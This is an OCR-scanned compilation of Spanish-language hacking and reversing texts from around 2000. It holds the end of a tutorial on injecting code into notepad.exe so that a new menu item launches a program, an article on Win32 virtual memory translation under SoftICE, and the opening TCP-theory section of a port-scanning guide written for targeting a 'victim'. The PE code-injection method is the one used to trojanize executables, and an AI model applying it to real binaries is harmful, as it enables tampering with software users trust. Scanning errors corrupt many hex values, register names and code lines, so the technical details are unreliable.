menú escribamos 10B8, la dirección virtual (menos la base de la imagen) invertida donde 
colocamos el nuevo menú. En el desplazamiento 52FCh, que corresponde al campo Size de esta 
estructura IMAGE_RESOURCE_DATA_ENTRY del menú, coloquemos el tamaño del nuevo 
menú, 0403 (invertido es 0304h). 


El incremento de tamaño del archivo nos obliga a corregir el encabezado PE, ya que el cragador 
del sistema revisa la información en el encabezado para reservar espacio antes de cargar el 
programa en memoria. Esto lo podemos hacer con Snippet Creator. Corremos Snippet Creator y 
abrimos nuestro notepad.exe (Action / New Target - Browse - elegimos notepad.exe - Save). 
Luego revisamos la información sobre el encabezado PE y sobre las secciones. Ejecutamos PE 
InfoView PE Header. Anotamos: 


Size of Image: 0OOCO00h = 49152 bytes 
Section Alignment 001000h = 4096 bytes 
File Alignment: 200h = 512 bytes 


Cerramos esta ventana (Cancel) y ejecutamos (PE Info 1 View Section Info). Hemos agregado 
nuestro nuevo menú en la última sección, que en notepad, como podemos ver, es .reloc. 
Anotamos los valores de esta sección: 


Virtual Size: 091Eh 
Raw Size: OAOOh 


Hemos aumentado la última sección en 768 - 490 = 278 = 116h bytes. Hay bastante espacio de 
memoria reservada para notepad.exe (Size of Image: O0OOCO00h = 49152 bytes como para tener 
que incrementar el valor de Size of Image. Así que sólo tenemos que incrementar el espacio 
ocupado por la data (Raw Size) y el tamaño virtual (virtual size) de .reloc (Virtual Size). El 
tamaño de la data hay que incrementarlo en múltiplos del valor del alineamiento de archivo (File 
Alignment). El tamño virtual hay que agregar el tamaño de la data que injertamos: 


Virtual Size: 091Eh + 0116h = 0A34h 
Raw Size: OAOOh + 0200h (File Alignment) = OCOOh 


Para hacer efectivos estos cambios, cerramos nuestra vista de notepad. exe en Hexworkshop, 
abrimos de nuevo notepad.exe con Snippet Creator y ejecutamos de nuevo PE Info Y View 
Section Info. Hacemos click con el botón derecho del ratón sobre ".reloc". En el menú emergente 
que se despliega elegiremos "Edit Section". Escribimos en Virtual Size = 0434; Save - Cancel. 


Ahora, para evitar problemas, corregimos la suma de chequeo. Esto es sencillo hacerlo con 
KrackPE. Abrimos nuestro notepad.exe con KrackPE. Veremos que de inmediato se activa el 
botón "Correct Sum”. Lo pulsamos y automáticamente se corregirá este valor. 


Corramos notepad. ¿Cómo se ve el menú? 


Por supuesto este nuevo item del menú no hace nada. Todavía tendríamos que injertar código en 
sitios estratégicos para ello. 


Injertar código 


Para injertar código en un PE tenemos que encontrar primero un espacio para él. Aprovechamos 
que tenemos notepad.exe cargado en KrackPE y pulsamos el botón Get greatest space. KrackPE 
nos dice que hay un espacio disponible de OIEAh= 490 bytes en la sección .data, en el 
desplazamiento 4016h. Conviene redondear el desplazamiento hasta 4020h. A la dirección virtual 


correspondiente lo llamamos VA1 = 00406220h, la dirección virtual de nuestro recorte. 


Otra dirección que tenemos que determinar, quizás la más importante, es el punto propicio para 
entregar el control a nuestro recorte. Tenemos que encontrar la rutina que es activada cuando el 
usuario elige algunos de los items del menú. Para esto tenemos que utilizar un depurador como 
Softlce o un desensamblador de programas de Windows como W32dasm de URSoftware CO. 


Si consigues este programa, abres con él nuestro notepad.exe e inicias una búsqueda 
(SearchWFindT ext) de las cadenas de los items del menú hasta dar con un fragmento de código 
interesante. Cuando se busca, por ejemplo, la cadena "cortar" llegamos al siguiente pasaje: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: | 
:0040119E(C) 


* Possible Ref to Menu: MenulID_0001, Item: "Cortar CTRL+X" 


:004011BA  3D00030000 cmp eax, 00000300 
:004011BF 7C21 31 004011E2 


¿Qué significa este código? ¿qué nos dice el desensamblador? Nos dice que 00000300 es una 
constante que equivale al identificador del item de menú "Cortar CTRL+X". El código en 
cuestión revisa si en eax (que seguramente tendrá el valor wParam del mensaje con el item del 
menú seleccionado por el usuario) hay un valor menor a 0304h, si ese es el caso, salta a la 


dirección virtual 4011E2h. 


Si revisamos un poco más arriba nos toparemos con el siguiente código: 


:00401195 0FB7750C movzx esi, word ptr [ebp+0C] 
:00401199 83FE20 cmp esi, 00000020 
:0040119C.  8BC6 mov eax, esl 

:0040119E 7FIA jg 004011BA 

:004011A0  0F84C1030000 je 00401567 


Es el código donde se mueve a eax el valor que será revisado en 004011BF. Vemos que si 
wParam es mayor que 20h, entonces llegaremos a 4011BA. Esto quiere decir que el identificador 
de nuestro item de menú debe ser mayor que 20h. Habíamos elegido al azar 0OCCh, que debería 
funcionar, porque es mayor a 20h. 


La dirección virtual VAO = 004011BA es la propicia para entregar el control a nuestro recorte en 
VA1= 00406220h. 


En VAO = 004011BAh que equivale al desplazamiento Offset0 = O0SBAh, debemos colocar la 
siguiente instrucción: 


4011BA: 6820624000 push 00406220h 
4011BF: C3 ret 
4011C0: 90 nop 


Esta instrucción entregará el control a nuestro recorte en VA1 = 406220h que equivale al 
desplazamiento Offset1 = 4020h. 


En código octal, la nueva instrucción en el desplazamiento O5BARH tiene la forma 68 20 62 40 00 
C3, donde 68 = push, 20624000 es el valor que metemos en la pila (al revés = 00406220) y C3 = 
ret, es decir, saltar a la dirección a la que apunta el puntero de pila (ESP). 


La labor de escribir la nueva instrucción podemos dejársela a Snippet Creator.Lo corremos y 
abrimos un proyecto nuevo (Edit 1 New Project); seleccionamos nuestro notepad.exe y ponemos 
el nombre de nuestro nuevo projecto: NP. 


Ahora elegimos las siguientes opciones generales (Action | Options). Las siguientes opciones 
suponen que usamos TASM v5.0 y lo tenemos instalado, con las variables de entorno correctas, 
en el directorio CATASM. También suponen que tenemos Snippet Creator en el dierctorio 
CATASMITOOLSUCZ. 


Assembler: TASM32 /ml %l 
Linker: TLINK32 /Tpe /c /aa /V4.0 %1,,,CATASMWLIB mport32.lib 
Project Directory: CATASMITOOLSUCZA 


Luego establecemos las opciones del proyecto (Action | Project Options). 


SnippetVa: 406220 (VA 1) 

Patch Into Existing Section 

Redirect Control From Code Section 
Virtual Address: 4011BA (VAO) 
Don't Return Control To Program 


Al elegir Redirect Control From Code Section y colocar en la venta correspondiente Virtual 
Address = 4011BA (VAO), nos liberamos del trabajo de escribir maualmente el salto que entrega 
el control a nuestro recorte. 


Luego escribimos en la ventana de edición el código: 


extrn ShellExecuteA 


jmp init: 


str db 'explorer.exe',0 


init: 

pushad 

cmp ax,00CCh ; ¿Se ha seleccionado el item "explorar"? 

jne al ; St no se ha seleccionado continuar con las rutinas originales 
lea esi,str 

call ShellExecuteA,0,0,es1,0,5  ; Ejecutar explorer.exe 

a0: 

popad 

push 4011C1h ; Devolver el control a 4011C1h 

ret 


al: 

cmp ax,0300h ; ¿Se ha elegido el item "Cortar"? 

jge a0 ; Si se ha elegido "Cortar" u otro con ID mayor, ir a 4011C1h 
popad 

push 4011E2h ; De lo contrario, ir a 4011E2h 

ret 


Ahora ensamblamos (pulsamos el botón Assemble o ejecutamos en el menú el comando Action Y 


Assemble) y parchamos a notepad.exe: Action | Patch Target. 


Verifiquemos ejecutando notepad.exe seleccionando el nuevo item "Explorar" o tecleando 


ALT+X.. 


Podemos cambiar nuestro recorte y el nombre de nuestro item de menú para que al seleccionar 
este item se active otro programa que podríamos poner en el mismo directorio que notepad.exe. 
También podríamos hacer muchas cosas más. Queda a la imaginación y destreza del programador 


lo que podría hacerse. 


Palabras finales 


Quisiera haber terminado este escrito con más aplicaciones prácticas de esta investigación, pero 
si así lo hiciera, la presentación del trabajo se atrasaría demasiado. Así que prefiero dejar esto 
para subsecuentes trabajos y proyectos en los que trabajo actualmente. Para estar informado sobre 
la culminación de alguno de estos proyectos, pueden visitar mensualmente la página "nuMIT_or's 


Programming Page" en http://members.xoom.com/numit_or/asm.html. Intento en lo posible hacer 
actualizaciones mensuales. Por lo pronto me concentraré en un buen tutorial sobre la 
programación en lenguaje ensamblador para Win32. También tengo unas ideas interesantes en el 
área de la Inteligencia Artificial que me encantaría compartir. 


Y bien, con esto culmino la serie de tres trabajos que había prometido realizar sobre los archivos 
PE. Cómo se puede observar, ha habido algunas secciones típicas que no he analizado. La razón 
de ello es que todavía no me he visto en la necesidad de ello. De todas maneras, si en cualquier 
momento me encuentro en esta necesidad, realizaré la investigación conveniente y lo haré 
público. 


Espero que este trabajo sea de tanta utilidad para los lectores como ha sido para mí escribirlo. 


Comentarios, observaciones: nuMIT_orCiname.com 
Febrero del 2000. 


La Memoria en W32: intro 


AUTOR Y RECOPILADOR: nuMIT_ or 

OBJETIVO: Suministrar conocimiento que permita comprender cómo W32 traduce direcciones 
virtuales en direcciones físicas. 

HERRAMIENTAS: SOFTICE v3.0 o mayor. 

FUENTE: PERTZOLD, Ch: Programación en Windows 95, Madrid, McGraw-Hill, 1996. 
Capítulo "Gestión de memoria y entrada/salida de archivos", Apartado: "Finalmente, 32 bits", pp 
727-730. 


NOTA: Gran parte de este artículo es reproducción literal de la fuente tomada. No he cambiado 
nada en muchos casos porque considero que se trata de una explicación bastante explícita del 
tema. Tampoco he querido diferenciar con comillas los textos tomados para evitar una redacción 
forzada. Espero que no se me tome como un plagiario. 


La gestión de memoria en W32 se realiza a través de tres mecanismos: 


1- memoria virtual: cuando se quiere gestionar grandes estructuras de objetos. 
2- proyección de archivos en memoria: para gestionar grandes paquetes de 
datos en los archivos y compartir datos entre procesos distintos. 

3- montículos (heaps): para gestionar muchos bloques pequeños de datos. 


El tema está suficientemente desarrollado en tres artículos clásicos de Randy Katz: 


1- Managing Virtual Memory in Win32 
2- Managing Memory-Mapped Files in Win32 
3- Managing Heap Memory in Win32 


En este artículo me limitaré a explicar un poco la gestión de la memoria virtual en W32, 
concetrándome en la manera cómo W32 traduce direcciones virtuales a direcciones reales. Se 
trata de una adpatación de la sección "Finalmente, 32 bits" del capítulo "Gestión de memoria y 
entrada/salida de archivos" del libro Programación en Windows 95 de Charles Petzold. 


¿QUÉ ES MEMORIA VIRTUAL? 


A medida que los programas de aplicación se han hecho más sofisticados y más grandes, se ha 
necesitado de ampliar las posibilidades de la memoria dinámica de los sistemas. Debido a lo poco 
económico que resulta atender la gran exigencia de memoria simplemente implementando ships 
con elevada capacidad de almacenamiento, este problema se ha abordado vía software, a través 
de sistemas operativos que ofrecen gestión de memoria virtual. 


Es un mecanismo de gestión de la memoria de un sistema que implementa un espacio de 
memoria ficticio, llamado espacio de direcciones o de nombres, el cual es mucho mayor que el 
espacio de memoria real física que posee el hardware del sistema. De esta manera, el 
programador al desarrollar aplicaciones para un SO con memoria virtual, no tiene que ocuparse 
de la memoria física, simplemente programa como si tuviera a su disposición una gran espacio de 
direcciones para cada proceso. 


¿CÓMO ES POSIBLE LA GESTIÓN DE MEMORIA VIRTUAL? 


El programador desarrolla sobre un gran espacio de memoria virtual, compila o ensambla sus 
fuentes para producir los ejecutables de sus aplicaciones. Es todo lo que hace. El SO se encarga 
de lo demás: traduce las direcciones virtuales en direcciones físicas y carga en la RAM del 
sistema sólo aquellos bloques de la aplicación que necesi ta, nunca carga todo el ejecutable ya 
que éste seguramente ocuparía todo el espacio de memoria física disponible y el sistema 
colapsaría. 


¿CÓMO TRADUCE W32 DIRECCIONES VIRTUALES A REALES? 


W32 requiere la presencia de un microprocesador Intel 386, 486 o Pentium. Estos procesadores 
usan direccionamiento de memoria de 32 bits y por tanto son capaces de acceder 2 elevado a la 
32, es decir, 4.294.967.296 bytes (4 gigabytes o GB) de memoria física. Por supuesto, la mayoría 
de los usuarios de W32 no están cerca de ese límite. 


Las direcciones de 32 bits usadas por los programas W32 para acceder al código y los datos no 
son las direcciones físicas de 32 bits que el microprocesador usa para direccionar la memoria 
física. La dirección que utiliza la aplicación se llama dirección «virtual» la cual es una dirección 
ficticia que se traduce a una dirección física a través de una «tabla de página». 


Para leer una instrucción o dato en la RAM, el CPU necesita colocar en el BUS de direcciones 


esa dirección donde debe estar ubicada la dirección o dato solicitado. Por ejemplo, si quiere 
acceder a la memoria de video, que está en OAO0O00h, el CPU debe colocar este valor en el BUS. 


Como las direciones de las aplicaciones son direcciones virtuales, el CPU debe traducirlas a 
direcciones físicas antes de acceder a los datos en la RAM. 


Las aplicaciones suelen ignorar este proceso. El programa parece almacenarse en un espacio de 
direcciones de 32 bits y no hay nada extraño cuando se tiene que acceder a esta memoria. Sin 
embargo, es conveniente hacerse una idea de lo que significa esto. 


W32 pagina la memoria física, la divide en «páginas» con una longitud de 4096 bytes (4 KB). 
Una máquina equipada con 8 megabytes de memoria tiene 2048 páginas. W95/98 mantiene una 
colección de tablas de página (ellas mismas páginas 4 KB) para traducir direcciones virtuales a 
direcciones físicas. 


Cualquier proceso en W32 tiene su propia «página de directorio», que es una colección de hasta 
1024 entradas de 32 bits almacenadas contiguamente, una después de otra. La dirección física de 
la página de directorio activa se almacena en un registro del microprocesador llamado CR3 
(CONTROL REGISTER 3), que se cambia cuando el SO conmuta el control entre procesos. Los 
10 bits altos de una dirección virtual especifican una de las 1024 entradas posibles en esta página 
de directorio. Los 20 bits altos de la entrada de la página de directorio indica una dirección física 
de una tabla de página (los 12 bits inferiores de la dirección física se definen a cero). Esto 
referencia otra página, que también tiene hasta 1024 entradas de 32 bits. Los 10 bits del medio de 
la dirección virtual referencian una de estas entradas. De nuevo, la entrada tiene una dirección 
física de 20 bits para indicar la posición de comienzo de un marco de página, que es una 
dirección física. Los 12 bits inferiores de una dirección virtual apuntan a una posición física 
dentro de este marco de página. 


Mostrado simbólicamente, uno puede representar una dirección virtual de 32 bits (que es con lo 
que trabaja una aplicación) como una entrada de página de directorio de 10 bits (d), una entrada 
de tabla de página de 10 bits (p) y un offset de 12 bits: 


dddd-dddd-ddpp-pppp-Pppp-0000-0000-0000 


Para cada proceso, el microprocesador almacena un valor de 20 bits en el registro CR3 (r de 
registro): 


EIrT-ITrr-ITrr-Trrr-rrrr 
La dirección física de comienzo de la página de directorio activa del proceso es: 


rrrr-rrrr-rrrr-rrrr-rrrr- 0000-0000-0000 


Recuérdese que todas las páginas se almacenan en límites de 4 KB, por tanto, cada página 
comienza en una dirección con los 12 bits inferiores igual a cero. El microprocesador primero 
accede a la dirección física: 


rrrr-rrrr-rrrr-rrrr-rrrr-dddd-dddd-dd00 


Esta posición contiene otro valor de 20 bits (t de tabla): 


tttt-tttt-tttt-tett-tttt 


lo cual indica la dirección física de comienzo de una tabla de página: 


tttt-tttt-tttt-tttt-tttt-0000-0000-0000 


El microprocesador accede luego a una dirección física: 


tttt-tttt-tttt-tttt-tttt-pppp-pppp-pp00 


Almacenado en este área hay un valor de 20 bits de un marco de página (c de marco): 


CCCC-CCCC-ECCCC-ECCC-ECCC 


La dirección fisíca final de 32 bits es una combinación de este marco de página con los 12 bits de 
offset inferiores de la dirección virtual: 


CCECC-ECCCC-ECCC-ECCC-CCCC-0000-0000-0000 


Esta es la dirección física. Es todo. 


Puede parecer que traducir una dirección virtual en dirección física es un proceso que lleva 
mucho tiempo, pero realmente no es así. Los microprocesadores Intel 386, 486 y Pentium tienen 
una memoria cache interna que puede guardar estas tablas de página dentro del microprocesador. 
La traducción se realiza de forma muy rápida sin ninguna penalización de tiempo. Esta doble 
paginación (páginas que se guardan en una página) ofrece a cada aplicación un límite teórico de 
aproximadamente un millón de páginas de 4 KB. 


EMPLEANDO SICE 


Podemos revisar el proceso de traducción de memoria virtual a memoria física con SICE. 


Carguemos notepad.exe con el loader de SICE. Cuando se despliega la pantalla de SICE, el 
depurador está apuntando a la primera instrucción del programa cuya dirección virtual es 
00401000h. A partir de esta dirección podemos calcular la dirección física donde se ubica esta 
instrucción en la RAM. 


Traduzcamos el valor hexadecimal de la dirección virtual a binario: 
0000 0000 0100 0000 0001 0000 0000 0000 


Tenemos: 
1. Entrada del directorio de páginas o primario, diez bytes altos: 


0000 0000 01 =1 

Es la entrada 1 del directorio primario 

2. Entrada de la tabla de páinas o directorio secundario, diez bytes medios: 
00 0000 0001 =1 

Es la entrada 1 del directorio secundario 

3. Desplazamiento en el marco de página de memoria física, doce bytes bajos restantes: 
0000 0000 0000 = 0 


Comienzo del marco de página o desplazamiento cero. Recuérdese que es la primera instrucción 
del programa. 


Para determinar exactamente la dirección física de la dirección debemos: 


1. obtener la dirección física donde está el directorio de páginas activas o directorio primario. 
Este valor está en CR3 y lo obtenemos con el comando 'CPU' de SICE. Cada entrada de este 
directorio es un puntero al directorio secundario. 


2. Obtener la dirección de la entrada en el directorio primario donde se encuentra la dirección del 


comienzo del directorio secundario. Sabemos la dirección del inicio del directorio primario por 

los 20 bits altos del contenido de CR3. La entrada dentro del directorio primario que dice donde 
está la tabla que interesa está indicada por los diez bits altos de la dirección virtual. Como cada 

entrada del directorio primario es de 32 bits = 4 bytes, hay que multiplicar el número de entrada 
por 4 para obtener la dirección de la entrada correspondiente en el directorio primario. 


3. obtener la dirección física dónde se encuentra la tabla de páginas o directorio secundario. Con 
la dirección de la entrada del directorio de página donde está la dirección de la tabla de páginas 
activas, se puede emplear el comando PEEK de SICE para obtener esta última dirección: 


PEEK D DIRECCIÓN _DE_ENTRADA_DE DIRECTORIO PRIMARIO 


4. obtener la dirección de la entrada en la tabla de páginas donde está la dirección del inicio o 
marco de la página donde está la instrucción apuntada por la dirección virtual. Sabemos la 
dirección del inicio del directorio secundario por los 20 bits altos del contenido la entrada del 
directorio primario. La entrada dentro del directorio primario que dice donde está el mmraco de 
página que buscamos está indicada por los diez bits medios de la dirección virtual. Como cada 
entrada del directorio secundario es de 32 bits=4 bytes, hay que multiplicar el número de entrada 
por 4 para obtener la dirección de la entrada correspondiente en el directorio secundario. 


5. obtener la dirección física dónde se encuentra el marco de página donde se ubica la instrucción 
señalada por la dirección virtual. Con la dirección de la entrada del directorio secundario donde 
está la dirección del marco de páginas, se puede emplear el comando PEEK de SICE para obtener 
esta última dirección, ya que este comando devuelve el contenido de una dirección física: 


PEEK D DIRECCIÓN _DE_ENTRADA_DE DIRECTORIO SECUNDARIO 


6. obtener la dirección física de la instrucción en la página específica. Este valor se obtiene a 
partir de los 20 bits altos del contenido en la entrada correspondiente en el directorio secundario y 
los 12 bits bajos en la dirección virtual. Estos bits bajos de la dirección virtual son un 
desplazamiento dentro del marco de página donde se ubicó el contenido de la aplicación. 


7. obtener el contenido en la dirección física señalada por el desplazamiento dentro del marco de 
página donde se encuentra el código o los datos indicados por la dirección virtual. Finalmente el 
comando 


PEEK D DESPLAZAMIENTO_EN_MARCO_DE_ PÁGINA 


devuelve, invertida, la instrucción en octal en la dirección virtual. Para comprobar esto, si el 
puntero de SICE apunta a esta dirección virtual el comando 


D EIP 


devuelve el mismo valor en la ventana de datos de SICE. También podemos verificar esto 
revisando el código en octal de la instrucción correspondiente. Debemos ver lo mismo pero 
invertido. El comando 


CODE ON 


lo mostrará. 


Continuemos con notepad.exe. 


Ya tenemos los valores que corresponden a la dirección virtual de la primera instrucción de 
notepad.exe 


La dirección física de la página de directorio o directorio primario lo obtenemos con el comando 
CPU de SICE: 008170000h. Traduzcámoslo a binario: 


0000 0000 1000 0001 0111 0000 0000 0000 


Los primeros 20 bits de este número indican la dirección física del comienzo del directorio 
primario del proceso activo. Los diez bits altos de la dirección virtual nos dicen que se trata de la 
primera entrada en este directorio 


0000 0000 1000 0001 0111 - 0000 0000 01 - 00 


A A 
bytes altos en CR3 - bytes altos 
en dir virtual 


obtenemos una nueva dirección física, la de la entrada 1 de la tabla de pá- 
ginas o directorio secundario: 00817004h. 


Ejecutemos el comando PEEK D 817004. 


PEEK D 00817004 


SICE nos dá: 01EFE267 


Obtenemos ahora la dirección física del directorio secundario. En binario: 


0000 0001 1110 1111 1110 0010 0110 0111 


Los doce bits altos de este valor apuntan al inicio del directorio secundario. Los diez bits medios 
indican una entrada dentro de este directorio. 


1100 0001 1011 1011 1111 - 00 0000 0001 - 00 


A A 


bytes altos en 0IEFE267  - bytes medios 
en dir virtual 


En hexadecimal: 01 EFF004H 


Esta entrada contiene la dirección del marco de página en memoria física donde se encuentra 
instrucción indicada por la dirección virtual. 


Ahora obtengamos la dirección del marco de página: 


PEEK D 01EFF004 


Obtenemos un valor como 01DEC225h. Traduzcamos este valor a binario: 


0000 0001 1101 1110 1100 0010 0010 1001 


Los 20 bits altos de este valor son la dirección física de un marco de página, es decir, del 
comienzo de una página de memoria física. Si agregamos a este valor el valor indicado por los 
doce bits bajos de la dirección virtual obtenemos la dirección física donde se haya la instrucción 
señalada por la dirección virtual: 


0000 0001 1101 1110 1100 - 0000 0000 0000 


A A 


bytes altos en 01DEC225h  - bytes bajos 
en dir virtual 
PEEK D 01DEC0000 


SICE devuelve 83EC8B55 


El valor devuelto por este comando corresponde a la instrucción en octal, pero invertido, a la que 
apunta la dirección virtual. Si esta es la dirección señalada por el puntero de SICE el siguiente 
comando nos devolverá el mismo valor regeresado antes: 


D EIP 


Vemos ahora que la ventana de datos de SICE apunta a 83EC8B35, en la dirección EIP, el mismo 
valor devuelto con el comando 'PEEK D 01DEC0000' 


Hagamos "code on" y veamos la correspondencia entre el valor desplegado por el último PEEK y 
el código en octal desplegado por SICE, que seguramente será el mismo pero invertido 


55 push ebp 
8BCE mov ebp, esp 
Sd: 


¿QUÉ VENTAJAS TIENE LA PAGINACIÓN? 


Las ventajas de la paginación son: 


Primero, las aplicaciones se aislan unas de otras. Ningún proceso puede inadvertidamente (o 
maliciosamente) escribir encima del espacio de código o datos de otro proceso, pues ni siquiera 
es capaz de direccionar la memoria del otro proceso sin el valor CR3 adecuado, y definir este 
valor es una tarea que sólo puede hacer el núcleo W32. 


Segundo, este mecanismo de paginación resuelve uno de los problemas más básicos en un 
entorno multitarea: la consolidación de la memoria libre. En un esquema de direccionamiento 
más simple, a medida que se ejecutan múltiples programas y se sale de ellos, la memoria se va 
fragmentando. Si la memoria está demasiado fragmentada, los programas no se pueden ejecutar 
porque no tienen suficiente memoria contigua, incluso aunque la cantidad total de memoria libre 
sea la adecuada. Con la paginación, no es necesario consolidar la memoria física libre porque las 
páginas no tienen que ser contiguas. Cualquier cosa se gestiona manipulando las tablas de página. 
La única pérdida viene realmente por el espacio perdido en las propias tablas de página y la 
granularidad de las páginas de 4 KB. 


Tercero, hay bits extra en las entradas de tabla de página de 32 bits además de las direcciones de 
20 bits. Un bit indica que se ha accedido a una página particular (se denomina bit de «acceso»); 
otro que la página ha sido escrita (el bit «sucio»). W32 puede usar estos bits para determinar si 
una página de memoria se puede intercambiar (swapping) a un archivo de disco para obtener más 
memoria física libre. Otro bit («presencia») indica si la página se ha intercambiado al disco y se 
tiene que recargar en memoria. 


Otro bit («lectura/escritura») indica si la página se puede escribir. Este bit protege el código de 
los punteros errantes. Por ejemplo, si se incluye la instrucción en código C siguiente en un 


programa Windows: 


* (int *) WinMain 0; 


se obtendrá un cuadro de mensaje diciendo: «Este programa ha realizado una operación ilegal y 
se cerrará». Este bit no evita que un programa compile el código fuente del programa y almacene 
las instrucciones de lenguaje ensamblador en memoria para ser ejecutadas. 


Las direcciones virtuales tienen un ancho de 32 bits. El código y los datos (estáticos, de pila o 
localizados) de un programa tendrán direcciones entre 0x00000000 y Ox 7FFFFFFE. El propio 
W32 usa direcciones desde 0x80000000 a OXFFFFFFFF y aquí es donde se encontrarán los 
puntos de entrada a las librerías de enlace dinámico (DLL) de W32. 


La cantidad total de memoria libre está determinada por la cantidad de memoria física libre y el 
área libre de disco duro disponible para intercambio de páginas. Como es normal con la gestión 
de memoria virtual, W325 emplea un algoritmo LRU (Least-Recently Used: usado-menos- 
reciente 

mente) para determinar qué páginas intercambiar a disco. Los bits de «acceso» y «sucio» le 
ayudan en esta tarea. Las páginas de código no tienen que guardarse en disco porque las páginas 
de código no son escribíbles, simplemente se puede recargar desde el archivo .EXE o la librería 
de enlace dinámico (DLL). 


A veces, se verá que se accede al disco cuando se mueve el ratón desde el área cliente de un 
programa al área cliente de otro programa. ¿Por qué ocurre esto? Windows tiene que enviar 
mensajes de movimiento de ratón a la segunda aplicación. Si el código del programa para 
procesar este mensaje no está cargado actualmente en memoria, Windows tiene que recargarlo 
desde el archivo de disco. Si tiene varios programas Windows grandes cargados simultáneamente 
y no tiene mucha memoria, probablemente verá una actividad inusual en el disco duro a medida 
que se mueve de programa a programa, pues Windows está recargando páginas descargadas 
previamente. 


A veces, los programas individuales se ralentizan (o se detienen completamente) cuando 
Windows está realizando el intercambio (conmutación) de páginas. Las páginas de código se 
pueden compartir entre aplicaciones. 


Esto es particularmente útil para las librerías de enlace dinámico. Varios programas ejecután- 
dose a la vez pueden usar las mismas funciones Windows 95, sin que sea necesario que el mismo 
código se cargue en memoria varias veces. Sólo es necesario una copia del código. 


Excepto la granularidad de las páginas de 4 KB, la memoria física no se puede fragmentar porque 
la desfragmentación implica únicamente manipular las tablas de página. Sin embargo, la memoria 
virtual de una aplicación se puede fragmentar si una aplicación localiza, relocaliza y libera varios 


bloques de memoria. El limite de 2 MB para el código y los datos de una aplicación normalmente 
es suficiente para evitar problemas. Es mucho más fácil que un programa se quede antes sin 
memoria física que llegue a encontrar un límite en la memoria virtual. Pero puede ocurrir, y si 
tiene un programa donde este problema es concebible, puede que desee considerar la memoria 
«movible». 


¿EL PROGRAMADOR PUEDE GESTIONAR LA MEMORIA VIRTUAL? 


Sí, por supuesto. Para ello W32 proporciona varias funciones API: 


Esta función se emplea para reservar y comprometer espacio de memoria 
virtual: 

LPVOID VirtualAlloc (LPVOID IpAddress, DWORD cbSize, 

DWORD fdwAllocationType, DWORD fdwProtec); 


Para liberar el espacio de memoria comprometido: 
BOOL VirtualFree (LPVOID IpAddress,SWORD cbSize, DWORD fdwFreeType); 


Bueno. Espero que este breve escrito sobre la gestión de memoria virtual en W32 pueda 
entenderse y sea de utilidad. 


Cualquier error u observación, por favor notifíquenme: 
nuMIT_orOiname.com 


Ir a: Descabezando archivos ejecutables portables 


/|[VIVIV[V[V[V[VIV|V[V[V[V|V[VIV|VIVIVIVA 
AV 

INN 

AV 

/N Scanning... Seek $ Destroy. /[ 

NV ooo W/ 

INN 

Y/ por CAOS - Ezkracho Team W/ 
INN 

AV 
/|[VIV[V[V[V[V[VIV|V[VIV[V|V[VIV|VIVIVIVA 
AV 

/N mail: ezkracho Ohotmail.com /N 
AV 

/N web: ezkracho.piratas.org /[ 

W/ www.ezkracho.com.ar A|/ 

INN 
NANA AJAJAJA JAJAJA JAJAJA / 


Este texto esta escrito dentro de los primeros 
"127" caracteres del codigo ASCII para evitar 
posibles errores al visualizarlo; por lo que no 
se usaran acentos y la "enie" se pondra como -. 


TEMARIO 


. Introduccion. 

. Breve teoria de TCP. 

. Que es el escaneo de puertos ? 

Diferentes tecnicas de escaneo de puertos. 
. Averiguando el Sistema Operativo. 
Fingerprinting. 

. Interpretando y explotando la informacion. 
. Acerca del Ezkracho Team. 

. Contacto. 


ADUADINO 


0. [ Introduccion ] 


En este texto vamos a ver distintas tecnicas con las que podemos 
buscar informacion sobre un host, y luego de que forma podemos 
aprovechar la informacion obtenida. Nos concentraremos mas que 
nada en el escaneo de puertos y en las tecnicas existentes para 


identificar que sistema operativo corre nuestra victima. 


Muchas veces recibi mails diciendo cosas como "ayudame a hackear 
pirulo.com, ya le hice un escaneo de puertos pero ahora no se que 
hacer”. Esto es algo muy comun, muchos al fijar los ojos en una 
victima lo primero que hacen es un port scanning, pero cuantos mas 
alla de la simple teoria conocen las diferentes tecnicas de escaneo, 

y mucho mas importante que hacer con la informacino obtenida. 


Con este texto intento que no solo sepamos que hacen muchos de los 
metodos que utilizamos, sino tambien como funcionan, porque al 

saber como funcionan comprenderemos mejor lo que estamos haciendo 
y aprovecharemos mas la informacion obtenida. 


Bueno, como siempre espero que disfruten tanto en leer este texto 
como yo en escribirlo. 


1. [ Breve teoria de TCP ] 


No es el objetivo de este texto explicar como funciona el protocolo 
TCP, pero dado que a medida que avansemos con la lectura se nos van 
a presentar terminos y conceptos referidos mas que nada a este 
protocolo, decidi hacer una breve introducion a la teoria del TCP, 

y a lo que mas nos interesa saber para este texto. Al que le interese 
saber mas sobre el TCP o el TCP/IP que busque en el respectivo RFC. 


El TCP es un protocolo que generalmente se usa con otros, o es mas 
conocido como TCP/IP; quiero aclarar que el TCP/IP es una suit de 
protocolos y no un solo protocolo como se cree comunmente, esto 
quiere decir que dentro del TCP/IP tenemos muchos protocolos pero 
se lo conoce asi por ser estos dos los mas representativos. 


El protocolo TCP es un servicio de comunicacion que forma un circuito, 
o lo que podriamos llamar una conexion. A diferencia de otros programas 
que usan UDP, con el TCP tenemos un servicio de conexion entre los 
programas llamados y los que llaman, chequeo de errores, control de 
flujo y capacidad de interrupcion. Por todo esto es que se dice que el 
TCP es un protocolo orientado a la conexion. 


A continuacion veremos como es el segmento TCP, ya que esto es lo que 
mas usaremos al ver escaneo de puertos y fingerprinting. 


Formato del segmento TCP 


El segmento TCP consiste en una cabecera y datos. A continuacion 
veremos una descripcion de los campos del segmento TCP. 


- Numero de puerto del origen/destino (Source/Destination Port 
Numbers): Este campo tiene una longitud de 16 bits. 


- Numeros de secuencia (Secuence Numbers): existen dos numeros de 
secuencia en la cabecera TCP. El primer numero de secuencia es el 
numero de secuencia final y el otro numero de secuencia es el numero 
de secuencia esperado de recepcion. 


- Longitud de la cabecera (Header Length): este campo tiene una 
longitud de 4 bits y contiene un entero igual al numero de octetos 
que forman la cabecera TCP dividido por cuatro. 


- Codigo de bits (Code bits): el motivo y contenido del segmento TCP 
lo indica este campo. Este campo tiene una longitud de seis bits: 


Bit URG (bit +5): cin este bit identificamos datos urgentes. 


Bit ACK (bit +4): cuando este bit se pone a 1, el campo reconocimiento 
es valido. 


Bit PSH (Bit +3): aunque el buffer no este lleno, como emisores 
podemos forzar a enviarlo. 


Bit RST (Bit +2): con este bit abortamos la conexion y todos los 
buffers asociados se vacian. 


Bit SYN (Bit +1): este bit sirve para sincronizar los numeros de 
secuencia. 


Bit FIN (Bit +0): este bit se utiliza solo cuando se esta cerrando la 
conexion. 


